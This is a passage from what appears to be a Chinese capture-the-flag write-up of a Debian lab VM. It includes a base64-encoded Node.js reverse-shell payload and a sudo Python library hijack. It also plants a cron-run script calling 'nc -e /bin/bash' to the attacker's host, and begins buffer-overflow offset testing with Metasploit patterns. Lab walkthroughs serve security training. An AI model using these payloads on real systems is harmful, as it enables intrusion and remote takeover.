xMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5LDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMyLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQsOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4LDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDExMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0LDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUsMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKX0oKSJ9Cg==<\/code><\/pre>\n
\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u53cd\u5f39shell\uff01\uff01\uff01<\/p>\n
\"image-20250617144112609\"<\/div>
\n
\"image-20250617144127461\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u52ab\u6301python\u5e93<\/h3>\n
(remote) www-data@debian:\/var\/www$ sudo -l\nMatching Defaults entries for www-data on debian:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on debian:\n    (ALL : low) NOPASSWD: \/usr\/bin\/python3 \/home\/low\/scripts\/script.py\n(remote) www-data@debian:\/var\/www$ cat \/home\/low\/scripts\/script.py\nimport main\nimport os\n\nprint("\\n")\nos.system("ip a | grep enp0s3")\n\nprint("\\n")\n(remote) www-data@debian:\/var\/www$ ls -la \/home\/low\/scripts\ntotal 16\ndrwxr-xr-x 2 low      low      4096 may  7  2021 .\ndrwxr-xr-x 8 low      low      4096 may  7  2021 ..\n-rwxr-xr-x 1 www-data www-data   88 may  7  2021 main.py\n-rw-r--r-- 1 low      low        80 may  7  2021 script.py\n(remote) www-data@debian:\/var\/www$ cat \/home\/low\/scripts\/main.py \nfrom os import system as main\nprint("\\n")\nprint("Just main")\nmain("whoami")\nprint("\\n")<\/code><\/pre>\n
\u53d1\u73b0\u53ef\u5199\uff0c\u8986\u76d6\u4e00\u4e0b\u5c31\u884c\u4e86\uff1a<\/p>\n
(remote) www-data@debian:\/var\/www$ cd \/home\/low\/scripts\/\n(remote) www-data@debian:\/home\/low\/scripts$ echo 'import os;os.system("\/bin\/bash");' > main.py\n(remote) www-data@debian:\/home\/low\/scripts$ sudo -u low  \/usr\/bin\/python3 \/home\/low\/scripts\/script.py\nlow@debian:~\/scripts$ cd ~\nlow@debian:~$ ls -la\ntotal 40\ndrwxr-xr-x 8 low  low  4096 may  7  2021 .\ndrwxr-xr-x 4 root root 4096 may  7  2021 ..\n-rw------- 1 low  low    37 may  7  2021 .bash_history\ndrwx------ 3 low  low  4096 may  7  2021 .gnupg\ndrwxr-xr-x 2 low  low  4096 may  7  2021 images\ndrwxr-xr-x 3 low  low  4096 may  7  2021 .local\ndrwxr-xr-x 2 low  low  4096 may  7  2021 projects\ndrwxr-xr-x 3 low  low  4096 jun 17 08:45 scripts\ndrwxr-xr-x 2 low  low  4096 may  7  2021 temp\n-rw-r--r-- 1 low  low    16 may  7  2021 user.txt\nlow@debian:~$ whoami;id\nlow\nuid=1001(low) gid=1001(low) grupos=1001(low)\nlow@debian:~$ cat user.txt \njustdeserialize\nlow@debian:~$ cd temp\nlow@debian:~\/temp$ ls -la\ntotal 8\ndrwxr-xr-x 2 low low 4096 may  7  2021 .\ndrwxr-xr-x 8 low low 4096 may  7  2021 ..\nlow@debian:~\/temp$ cd ..<\/code><\/pre>\n
\u5b9a\u65f6\u4efb\u52a1\u63d0\u6743\u7528\u6237<\/h3>\n
\u7ee7\u7eed\u4fe1\u606f\u641c\u96c6\u4e86\uff1a<\/p>\n
(remote) low@debian:\/home\/low$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/sbin\/pppd\n\/usr\/bin\/bwrap\n\/usr\/bin\/umount\n\/usr\/bin\/fusermount\n\/usr\/bin\/su\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/pkexec\n\/usr\/bin\/ntfs-3g\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/xorg\/Xorg.wrap\n(remote) low@debian:\/home\/low$ cat .bash_history \n\necho '' > ~\/.bash_history\nexit\nexit\n(remote) low@debian:\/home\/low$ getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/gnome-keyring-daemon = cap_ipc_lock+ep\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/lib\/i386-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep\n(remote) low@debian:\/home\/low$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Es un directorio\ncat: \/etc\/cron.daily: Es un directorio\ncat: \/etc\/cron.hourly: Es un directorio\ncat: \/etc\/cron.monthly: Es un directorio\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ && run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n*\/1 *   * * *   debian \/usr\/bin\/python3 \/home\/debian\/Documentos\/backup\/dissapeared.py ; echo "Done" >> \/home\/debian\/Documentos\/log \n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Es un directorio\n(remote) low@debian:\/home\/low$ cat \/home\/debian\/Documentos\/backup\/dissapeared.py\ncat: \/home\/debian\/Documentos\/backup\/dissapeared.py: No existe el fichero o el directorio\n(remote) low@debian:\/home\/low$ cd ..\n(remote) low@debian:\/home$ ls -la\ntotal 16\ndrwxr-xr-x  4 root   root   4096 may  7  2021 .\ndrwxr-xr-x 19 root   root   4096 may  7  2021 ..\ndrwxr-xr-x 15 debian debian 4096 may  8  2021 debian\ndrwxr-xr-x  8 low    low    4096 may  7  2021 low\n(remote) low@debian:\/home$ cd debian\/\n(remote) low@debian:\/home\/debian$ ls -la\ntotal 144\ndrwxr-xr-x 15 debian debian  4096 may  8  2021 .\ndrwxr-xr-x  4 root   root    4096 may  7  2021 ..\n-rw-------  1 debian debian    59 may  7  2021 .bash_history\n-rw-r--r--  1 debian debian   220 may  7  2021 .bash_logout\n-rw-r--r--  1 debian debian  3526 may  7  2021 .bashrc\ndrwxr-xr-x  6 debian debian  4096 may  7  2021 .cache\ndrwxr-xr-x  5 debian debian  4096 may  7  2021 .config\ndrwxr-xr-x  2 debian low     4096 may  8  2021 Descargas\n-rw-r--r--  1 debian debian    35 may  7  2021 .dmrc\ndrwxrwx---  2 debian low     4096 may  7  2021 Documentos\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Escritorio\ndrwx------  3 debian debian  4096 may  7  2021 .gnupg\n-rw-------  1 debian debian   628 may  8  2021 .ICEauthority\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Im\u00e1genes\ndrwxr-xr-x  3 debian debian  4096 may  7  2021 .local\ndrwx------  5 debian debian  4096 may  7  2021 .mozilla\ndrwxr-xr-x  2 debian low     4096 may  7  2021 M\u00fasica\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Plantillas\n-rw-r--r--  1 debian debian   807 may  7  2021 .profile\ndrwxr-xr-x  2 debian low     4096 may  7  2021 P\u00fablico\ndrwxr-xr-x  2 debian low     4096 may  7  2021 V\u00eddeos\n-rw-r--r--  1 debian debian   180 may  7  2021 .wget-hsts\n-rw-------  1 debian debian    51 may  8  2021 .Xauthority\n-rw-r--r--  1 debian debian 17774 may  8  2021 .xfce4-session.verbose-log\n-rw-r--r--  1 debian debian 21283 may  7  2021 .xfce4-session.verbose-log.last\n-rw-------  1 debian debian  2663 may  8  2021 .xsession-errors\n-rw-------  1 debian debian  3491 may  7  2021 .xsession-errors.old\n(remote) low@debian:\/home\/debian\/Documentos$ ls -la\ntotal 12\ndrwxrwx---  2 debian low    4096 may  7  2021 .\ndrwxr-xr-x 15 debian debian 4096 may  8  2021 ..\n-rw-r--r--  1 debian debian  400 jun 17 08:51 log\n(remote) low@debian:\/home\/debian\/Documentos$ head log\nDone\nDone\nDone\nDone\nDone\nDone\nDone\nDone\nDone\nDone<\/code><\/pre>\n
\u53d1\u73b0\u8be5\u76ee\u5f55\u54b1\u4eec\u8fd9\u4e2alow<\/code>\u7528\u6237\u53ef\u5199\uff0c\u5c1d\u8bd5\u5199\u4e00\u4e2abackup\/dissapeared.py<\/code>\u8fdb\u53bb\uff1a<\/p>\n
(remote) low@debian:\/home\/debian\/Documentos$ mkdir backup\n(remote) low@debian:\/home\/debian\/Documentos$ chmod 777 backup\n(remote) low@debian:\/home\/debian\/Documentos$ cd backup\/\n(remote) low@debian:\/home\/debian\/Documentos\/backup$ echo "import os;os.system('nc -e \/bin\/bash 192.168.10.107 2345')" > dissapeared.py\n(remote) low@debian:\/home\/debian\/Documentos\/backup$ chmod +x dissapeared.py<\/code><\/pre>\n
\u5b9a\u65f6\u4efb\u52a1\u4e00\u5206\u949f\u4e00\u6b21\uff0c\u7b49\u4e00\u4e0b\u5c31\u884c\uff1a<\/p>\n
\"image-20250617145608247\"<\/div><\/p>\n
\u7f13\u51b2\u533a\u6ea2\u51fa\u63d0\u6743root<\/h3>\n
(remote) debian@debian:\/home\/debian$ ls -la\ntotal 144\ndrwxr-xr-x 15 debian debian  4096 may  8  2021 .\ndrwxr-xr-x  4 root   root    4096 may  7  2021 ..\n-rw-------  1 debian debian    59 may  7  2021 .bash_history\n-rw-r--r--  1 debian debian   220 may  7  2021 .bash_logout\n-rw-r--r--  1 debian debian  3526 may  7  2021 .bashrc\ndrwxr-xr-x  6 debian debian  4096 may  7  2021 .cache\ndrwxr-xr-x  5 debian debian  4096 may  7  2021 .config\ndrwxr-xr-x  2 debian low     4096 may  8  2021 Descargas\n-rw-r--r--  1 debian debian    35 may  7  2021 .dmrc\ndrwxrwx---  3 debian low     4096 jun 17 08:52 Documentos\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Escritorio\ndrwx------  3 debian debian  4096 may  7  2021 .gnupg\n-rw-------  1 debian debian   628 may  8  2021 .ICEauthority\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Im\u00e1genes\ndrwxr-xr-x  3 debian debian  4096 may  7  2021 .local\ndrwx------  5 debian debian  4096 may  7  2021 .mozilla\ndrwxr-xr-x  2 debian low     4096 may  7  2021 M\u00fasica\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Plantillas\n-rw-r--r--  1 debian debian   807 may  7  2021 .profile\ndrwxr-xr-x  2 debian low     4096 may  7  2021 P\u00fablico\ndrwxr-xr-x  2 debian low     4096 may  7  2021 V\u00eddeos\n-rw-r--r--  1 debian debian   180 may  7  2021 .wget-hsts\n-rw-------  1 debian debian    51 may  8  2021 .Xauthority\n-rw-r--r--  1 debian debian 17774 may  8  2021 .xfce4-session.verbose-log\n-rw-r--r--  1 debian debian 21283 may  7  2021 .xfce4-session.verbose-log.last\n-rw-------  1 debian debian  2663 may  8  2021 .xsession-errors\n-rw-------  1 debian debian  3491 may  7  2021 .xsession-errors.old\n(remote) debian@debian:\/home\/debian$ cat .bash_history\n\necho '' > ~\/.bash_history\nexit\nsudo -l\nclear\nsu root\nexit\n(remote) debian@debian:\/home\/debian$ cd .mozilla\n(remote) debian@debian:\/home\/debian\/.mozilla$ ls -la\ntotal 20\ndrwx------  5 debian debian 4096 may  7  2021 .\ndrwxr-xr-x 15 debian debian 4096 may  8  2021 ..\ndrwx------  2 debian debian 4096 may  7  2021 extensions\ndrwx------  6 debian debian 4096 may  7  2021 firefox\ndrwx------  2 debian debian 4096 may  7  2021 systemextensionsdev<\/code><\/pre>\n
\u53d1\u73b0\u5b58\u5728\u706b\u72d0\uff0c\u5c1d\u8bd5\u63d0\u53d6\u91cc\u9762\u7684\u51ed\u8bc1\uff1a<\/p>\n
\"image-20250617145802133\"<\/div><\/p>\n
\u4f46\u662f\u5e76\u672a\u53d1\u73b0\u5229\u7528\u70b9\u3002\u5c1d\u8bd5\u522b\u7684\u8def\u5b50\uff1a<\/p>\n
(remote) debian@debian:\/home\/debian$ sudo -l\nMatching Defaults entries for debian on debian:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser debian may run the following commands on debian:\n    (ALL : root) NOPASSWD: \/bin\/wine \/opt\/Buffer-Overflow-Vulnerable-app\/brainfuck.exe<\/code><\/pre>\n
\u6b38\uff0c\u6211\u8bb0\u5f97\u4e4b\u524d\u9700\u8981\u5bc6\u7801\u6765\u7740\uff1f\u6211\u8bb0\u6df7\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n
(remote) debian@debian:\/home\/debian$ file \/opt\/Buffer-Overflow-Vulnerable-app\/brainfuck.exe\n\/opt\/Buffer-Overflow-Vulnerable-app\/brainfuck.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows<\/code><\/pre>\n
\u6c83\u65e5\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n
(remote) debian@debian:\/home\/debian$ cd \/opt\/\n(remote) debian@debian:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x  3 root   root   4096 may  7  2021 .\ndrwxr-xr-x 19 root   root   4096 may  7  2021 ..\ndrwxr-xr-x  6 debian debian 4096 may  7  2021 Buffer-Overflow-Vulnerable-app\n(remote) debian@debian:\/opt$ cd Buffer-Overflow-Vulnerable-app\/\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ ls -la\ntotal 9240\ndrwxr-xr-x  6 debian debian    4096 may  7  2021 .\ndrwxr-xr-x  3 root   root      4096 may  7  2021 ..\n-rw-r--r--  1 debian debian   21190 may  7  2021 brainfuck.exe\n-rw-r--r--  1 debian debian   21190 may  7  2021 brainpan.exe\n-rw-r--r--  1 debian debian   13312 may  7  2021 dostackbufferoverflowgood.exe\ndrwxr-xr-x  8 debian debian    4096 may  7  2021 .git\ndrwxr-xr-x 54 debian debian    4096 may  7  2021 node_modules\n-rw-r--r--  1 debian debian      60 may  7  2021 NOTE.txt\ndrwxr-xr-x  2 debian debian    4096 may  7  2021 oscp\n-rw-r--r--  1 debian debian   14740 may  7  2021 package-lock.json\n-rw-r--r--  1 debian debian     277 may  7  2021 README.md\n-rw-r--r--  1 debian debian 9266237 may  7  2021 SLMail.exe\n-rw-r--r--  1 debian debian   76152 may  7  2021 vcruntime140.dll\ndrwxr-xr-x  2 debian debian    4096 may  7  2021 vulnserver\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ cd oscp\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app\/oscp$ ls -la\ntotal 84\ndrwxr-xr-x 2 debian debian  4096 may  7  2021 .\ndrwxr-xr-x 6 debian debian  4096 may  7  2021 ..\n-rw-r--r-- 1 debian debian 16601 may  7  2021 essfunc.dll\n-rw-r--r-- 1 debian debian 54648 may  7  2021 oscp.exe<\/code><\/pre>\n
\u627e\u4e00\u4e0b\u662f\u5565\uff1a<\/p>\n
\"image-20250617151534432\"<\/div><\/p>\n
\u6ea2\u51fa\u6f0f\u6d1e\u3002\u3002\u3002\u53d1\u73b0\u6709.git<\/code>\uff0c\u770b\u4e00\u4e0b\u5565\u60c5\u51b5\uff1a<\/p>\n
(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ git log\ncommit 38dd2e0ca9878deb70baa35246f0ac93c114acde (HEAD -> main, origin\/main, origin\/HEAD)\nAuthor: Shamsher khan <32321996+shamsherkhan852@users.noreply.github.com>\nDate:   Mon Apr 5 10:56:59 2021 +0530\n\n    Update README.md\n\ncommit 86edb8d75b2cf18ac6f691dd103c1a49f92f8ce7\nAuthor: Shamsher khan <32321996+shamsherkhan852@users.noreply.github.com>\nDate:   Mon Apr 5 10:55:56 2021 +0530\n\n    Add files via upload\n\ncommit cdd6f9b4622cda4e082bfe49dff1a05cfcb42a72\nAuthor: Shamsher khan <32321996+shamsherkhan852@users.noreply.github.com>\nDate:   Mon Apr 5 10:54:24 2021 +0530\n\n    Initial commit\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ git diff 86edb8d75b2cf18ac6f691dd103c1a49f92f8ce7\ndiff --git a\/README.md b\/README.md\nindex 0d05efa..5f17a8e 100644\n--- a\/README.md\n+++ b\/README.md\n@@ -1 +1,6 @@\n # Tryhackme-BufferOverflow-prep\n+    The SLMail installer.\n+    The brainpan binary.\n+    The dostackbufferoverflowgood binary.\n+    The vulnserver binary.\n+    A custom written "oscp" binary which contains 10 buffer overflows, each with a different EIP offset and set of badchars.\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ git diff cdd6f9b4622cda4e082bfe49dff1a05cfcb42a72\ndiff --git a\/README.md b\/README.md\nindex ce623ca..5f17a8e 100644\n--- a\/README.md\n+++ b\/README.md\n@@ -1 +1,6 @@\n-# Buffer-Overflow-Vulnerable-app\n\\ No newline at end of file\n+# Tryhackme-BufferOverflow-prep\n+    The SLMail installer.\n+    The brainpan binary.\n+    The dostackbufferoverflowgood binary.\n+    The vulnserver binary.\n+    A custom written "oscp" binary which contains 10 buffer overflows, each with a different EIP offset and set of badchars.\ndiff --git a\/SLMail.exe b\/SLMail.exe\nnew file mode 100644\nindex 0000000..2a0c3a2\nBinary files \/dev\/null and b\/SLMail.exe differ\ndiff --git a\/brainpan.exe b\/brainpan.exe\nnew file mode 100644\nindex 0000000..4c6beb6\nBinary files \/dev\/null and b\/brainpan.exe differ\ndiff --git a\/dostackbufferoverflowgood.exe b\/dostackbufferoverflowgood.exe\nnew file mode 100644\nindex 0000000..043b2d3\nBinary files \/dev\/null and b\/dostackbufferoverflowgood.exe differ\ndiff --git a\/oscp\/essfunc.dll b\/oscp\/essfunc.dll\nnew file mode 100644\nindex 0000000..e2b95db\nBinary files \/dev\/null and b\/oscp\/essfunc.dll differ\ndiff --git a\/oscp\/oscp.exe b\/oscp\/oscp.exe\nnew file mode 100644\nindex 0000000..f49e979\nBinary files \/dev\/null and b\/oscp\/oscp.exe differ\ndiff --git a\/vcruntime140.dll b\/vcruntime140.dll\nnew file mode 100644\nindex 0000000..3fd5a9b\nBinary files \/dev\/null and b\/vcruntime140.dll differ\ndiff --git a\/vulnserver\/essfunc.dll b\/vulnserver\/essfunc.dll\nnew file mode 100644\nindex 0000000..e2b95db\nBinary files \/dev\/null and b\/vulnserver\/essfunc.dll differ\ndiff --git a\/vulnserver\/vulnserver.exe b\/vulnserver\/vulnserver.exe\nnew file mode 100644<\/code><\/pre>\n
\u7591\u4f3c\u627e\u5230\u4e86\u51fa\u5904\uff1aTryhackme-BufferOverflow-prep<\/code>\uff0c\u7136\u540e\u61c2\u5f97\u90fd\u61c2\uff0c\u53ef\u4ee5\u53c2\u8003\u5927\u4f6c\u7684\u535a\u5ba2\uff1a<\/p>\n
https:\/\/github.com\/Tib3rius\/Pentest-Cheatsheets\/blob\/master\/exploits\/buffer-overflows.rst<\/a><\/p>\n
\u5c1d\u8bd5\u8fdb\u884c\u6ea2\u51fa\u6d4b\u8bd5\uff1a<\/p>\n
\u521b\u5efa\u73af\u5883<\/h4>\n
\u76f4\u63a5\u8fd0\u884c\u5373\u53ef\uff1a<\/p>\n
(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ sudo -u root \/bin\/wine \/opt\/Buffer-Overflow-Vulnerable-app\/brainfuck.exe\n[+] initializing winsock...done.\n[+] server socket created.\n[+] bind done on port 9999\n[+] waiting for connections.<\/code><\/pre>\n
\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\u770b\u770b\u662f\u5426\u53ef\u4ee5\u6b63\u5e38\u8fde\u63a5\u4e0a\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ sudo nmap -sS $IP\n[sudo] password for kali: \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-17 03:44 EDT\nNmap scan report for 192.168.10.102\nHost is up (0.00047s latency).\nNot shown: 996 closed tcp ports (reset)\nPORT     STATE SERVICE\n22\/tcp   open  ssh\n80\/tcp   open  http\n3000\/tcp open  ppp\n9999\/tcp open  abyss\nMAC Address: 08:00:27:32:F2:2A (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.59 seconds<\/code><\/pre>\n
\u5b9a\u4f4d\u6ea2\u51fa\u957f\u5ea6<\/h4>\n
\"image-20250617154814077\"<\/div><\/p>\n
\u5148\u770b\u770b\u662f\u5426\u5b58\u5728\u6ea2\u51fa\uff1a<\/p>\n
\"image-20250617155329512\"<\/div><\/p>\n
\u660e\u663e\u5b58\u5728\uff1a<\/p>\n
\"image-20250617155400111\"<\/div><\/p>\n
\u5c1d\u8bd5\u6784\u5efa\u7279\u5b9a\u6076\u610f\u5b57\u7b26\u4e32\u8fdb\u884c\u6d4b\u8bd5\u957f\u5ea6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 500 \nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq<\/code><\/pre>\n
\u770b\u770b\u5d29\u6e83\u5728\u54ea\u91cc\uff1a<\/p>\n
\"image-20250617155615682\"<\/div><\/p>\n
\u5c45\u7136\u6ca1\u4e8b\uff0c\u6539\u4e3a1000\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 1000\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B<\/code><\/pre>\n
\"image-20250617155706273\"<\/div><\/p>\n
